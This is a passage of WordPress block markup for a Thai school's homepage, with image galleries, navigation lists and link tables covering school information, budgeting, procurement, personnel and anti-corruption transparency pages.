{\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 